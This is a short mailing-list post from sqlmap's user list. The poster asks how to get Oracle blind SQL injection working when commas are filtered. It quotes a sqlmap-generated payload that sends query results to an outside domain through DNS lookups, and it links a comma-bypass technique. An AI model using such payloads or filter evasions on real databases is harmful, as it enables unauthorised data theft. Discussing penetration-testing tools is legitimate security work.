Heya,

Sqlmap identifies an Oracle blind injection point, but commas are filtered
so I get no data even when using --dns-domain.

Even with --dns-domain there are substrings (,) in the query:
---
AND ASCII(SUBSTRC((SELECT
UTL_INADDR.GET_HOST_ADDRESS(CHR(71)||CHR(113)||CHR(80)||CHR(46)||(SELECT
RAWTOHEX(SUBSTRC((NVL(CAST(3180 AS VARCHAR(4000)),CHR(32))),1,31)) FROM
DUAL)||CHR(46)||CHR(117)||CHR(81)||CHR(117)||CHR(46)||CHR(122)||CHR(117)||CHR(112)||CHR(119)||CHR(101)||CHR(116)||CHR(98)||CHR(49)||CHR(46)||CHR(110)||CHR(111)||CHR(45)||CHR(105)||CHR(112)||CHR(46)||CHR(98)||CHR(105)||CHR(122))
FROM DUAL),8,1))>914 AND (7100=7100)
---

Is there a way to do the technique described on this page with sqlmap?
http://www.notsosecure.com/folder2/2008/05/24/getting-past-the-comma-in-oracle-sql-injection/

M
_______________________________________________
sqlmap-users mailing list
sqlmap-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/sqlmap-users
